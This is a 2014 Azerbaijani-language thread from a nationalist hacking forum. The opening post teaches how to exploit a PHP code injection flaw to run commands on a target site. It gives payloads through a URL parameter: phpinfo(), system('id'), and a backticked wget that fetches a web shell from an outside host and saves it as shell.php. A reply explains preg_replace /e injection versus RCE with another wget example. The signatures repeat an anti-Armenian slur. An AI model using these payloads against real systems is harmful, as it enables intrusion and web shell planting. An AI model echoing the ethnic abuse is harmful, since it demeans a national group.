Anti-armenia.ORG - Forumlar - Code İnjection+ Upload Shell!



Istifadəçi
    2014-09-05 21:12 GMT                 

Cahangir25



Informatix
Mesaj Sayı : 1142
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   91  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : PHP
Ölkə :
Məslək : Front-end Web Developer
Yaş :
Mesaj :

Mövzunu Paylaş!


Salamlar ... Videoda Code İnjection açığı olan sayta necə system əmrləri verə bilərsiz onu göstərmişəm ..

Video :





Bəzi əmrlər :

1) phpinfo() -almaq :

Kod:
hedef.am/abc.php?h=phpinfo()


2)System("id") -almaq :

Kod:
system("id")


3) İstənilən faylı upload etmə :

Kod:
`wget www.shellsayti.com/shell.txt -O shell.php `


Pun!sh3R-e xüsusi təşəkkürlər ...

+1 rep Versəz Əla!

AZERBAIJAN!!! FUCK armenia!!!
Anti-armenia.ORG
    

Istifadəçi
    2014-09-05 21:13 GMT                 

HackerAZTURK!



Banned
Mesaj Sayı : 57
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 25
Mesaj :

Mövzunu Paylaş!


SUPER +1 REP məndən.

Anti-armenia.ORG
    

Istifadəçi
    2014-09-05 21:15 GMT                 

Cahangir25



Informatix
Mesaj Sayı : 1142
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   91  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : PHP
Ölkə :
Məslək : Front-end Web Developer
Yaş :
Mesaj :

Mövzunu Paylaş!


Sitat
#41758 HackerAZTURK! :
SUPER +1 REP məndən.



Buyur brom) Videodaki elə sizin saytdı

AZERBAIJAN!!! FUCK armenia!!!
Anti-armenia.ORG
    

Istifadəçi
    2014-09-05 21:15 GMT                 

PreDaToR



İstifadəçi
Mesaj Sayı : 455
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   24  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : ....................
Yaş : 33
Mesaj :

Mövzunu Paylaş!


təşəkkür qardaş bu gün rep vermişəm onçun indi alınmır

http://s003.radikal.ru/i201/1502/48/5d4c5862c2f3.jpg
En mutlu günlerimizi en kötü kabuslara çevirenleri en tatlı rüyalarından uyandıracağız
Anti-armenia.ORG
    

Istifadəçi
    2014-09-05 21:16 GMT                 

Cr0sby



VIP
Mesaj Sayı : 230
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   4  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Baku
Ölkə :
Məslək : Hard Defacer, it's only beginning.
Yaş : 27
Mesaj :

Mövzunu Paylaş!


1+ əla çox sağol lazımlı mövzudu

Hərşey VƏTƏN üçün!
Anti-armenia.ORG
    

Istifadəçi
    2014-09-05 21:18 GMT                 

Cahangir25



Informatix
Mesaj Sayı : 1142
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   91  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : PHP
Ölkə :
Məslək : Front-end Web Developer
Yaş :
Mesaj :

Mövzunu Paylaş!


Buyurun dostlar ..

Elnur312 - canın sağ olsun

AZERBAIJAN!!! FUCK armenia!!!
Anti-armenia.ORG
    

Istifadəçi
    2014-09-05 21:21 GMT                 

Dj_eLeCTRo



İstifadəçi
Mesaj Sayı : 360
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   3  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər.
+1 rep də məndən

Anti-armenia.ORG
    

Istifadəçi
    2014-09-05 21:25 GMT                 

Cahangir25



Informatix
Mesaj Sayı : 1142
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   91  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : PHP
Ölkə :
Məslək : Front-end Web Developer
Yaş :
Mesaj :

Mövzunu Paylaş!


Buyur)

AZERBAIJAN!!! FUCK armenia!!!
Anti-armenia.ORG
    

Istifadəçi
    2014-09-05 21:33 GMT                 

PuN!Sh3r



Gold
Mesaj Sayı : 308
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : W00t W00t
Ölkə :
Məslək : Cyber Security Specialist
Yaş :
Mesaj :

Mövzunu Paylaş!


Bro axı sənə dedim ki bu RCE deyil..
Bunu sənə misal kimi göndərmişdim və yazmışdım ki bu RCE deyil sadəcə preg_replace i /regex/e kimi işlədəndə ortaya çıxan bir növ php code inj dir və əlavə etmişdim ki buna bənzər hallarda , bunun kimi funksiyalarda çıxa bilər RCE.
Burada olan eynilə eval(); kimi birşeydi.
Sən orada yazdın phpinfo() . Bu bəyəm sistem əmridir ?
Ona görə axırda işlədi ki sən `` (backtick) işlətdin + preg_replace outputu ekrana vurdu.

Çox xahiş edirəm hamıdan nə mövzu açsaz araşdırıb açın.

Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..
Anti-armenia.ORG
    

Istifadəçi
    2014-09-05 21:37 GMT                 

Cahangir25



Informatix
Mesaj Sayı : 1142
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   91  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : PHP
Ölkə :
Məslək : Front-end Web Developer
Yaş :
Mesaj :

Mövzunu Paylaş!


Sitat
#41765 PuN!Sh3r :
Bro axı sənə dedim ki bu RCE deyil..
Bunu sənə misal kimi göndərmişdim və yazmışdım ki bu RCE deyil sadəcə preg_replace i /regex/e kimi işlədəndə ortaya çıxan bir növ php code inj dir və əlavə etmişdim ki buna bənzər hallarda , bunun kimi funksiyalarda çıxa bilər RCE.
Burada olan eynilə eval(); kimi birşeydi.
Sən orada yazdın phpinfo() . Bu bəyəm sistem əmridir ?
Ona görə axırda işlədi ki sən `` (backtick) işlətdin + preg_replace outputu ekrana vurdu.

Çox xahiş edirəm hamıdan nə mövzu açsaz araşdırıb açın.



Belə götürəndə , çoxdaki marağlı deyil mənə RCE vəya Code İnjection ...
Mənə sadəcə əmrim marağlıdı ...
Code İnjection və RCE - ayıra bilmirəm

AZERBAIJAN!!! FUCK armenia!!!
Anti-armenia.ORG
    

Istifadəçi
    2014-09-05 21:42 GMT                 

PuN!Sh3r



Gold
Mesaj Sayı : 308
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : W00t W00t
Ölkə :
Məslək : Cyber Security Specialist
Yaş :
Mesaj :

Mövzunu Paylaş!


Sitat
#41766 Cahangir25 :
Sitat
#41765 PuN!Sh3r :
Bro axı sənə dedim ki bu RCE deyil..
Bunu sənə misal kimi göndərmişdim və yazmışdım ki bu RCE deyil sadəcə preg_replace i /regex/e kimi işlədəndə ortaya çıxan bir növ php code inj dir və əlavə etmişdim ki buna bənzər hallarda , bunun kimi funksiyalarda çıxa bilər RCE.
Burada olan eynilə eval(); kimi birşeydi.
Sən orada yazdın phpinfo() . Bu bəyəm sistem əmridir ?
Ona görə axırda işlədi ki sən `` (backtick) işlətdin + preg_replace outputu ekrana vurdu.

Çox xahiş edirəm hamıdan nə mövzu açsaz araşdırıb açın.



Belə götürəndə , çoxdaki marağlı deyil mənə RCE vəya Code İnjection ...
Mənə sadəcə əmrim marağlıdı ...
Code İnjection və RCE - ayıra bilmirəm




Mən sadəcə başa salmaq istəyirəm ki, php code inj-i code executiona çevirmək mümkündür ona görə ki system(); , ``, passthru,exec və s. kimi funksiyaları var. Bundan xəbəri olmayan elə biləcək ki ` ls ` yazsa real RCE də listing verəcək. Amma əslində RCE də backtick ə falan ehtiyac yoxdur. Pure commands rulezz yəni sənin misalında wpindex.php?h=wget http://blahhh (wpindex.php?h=`wget http://blahh` yox)

Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..
Anti-armenia.ORG
    

Istifadəçi
    2014-09-06 10:01 GMT                 

Psychopath



İstifadəçi
Mesaj Sayı : 8
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Əllərinə sağlıq

Bir gün ölmek üçün, hər gün yaşıyırıq.
Anti-armenia.ORG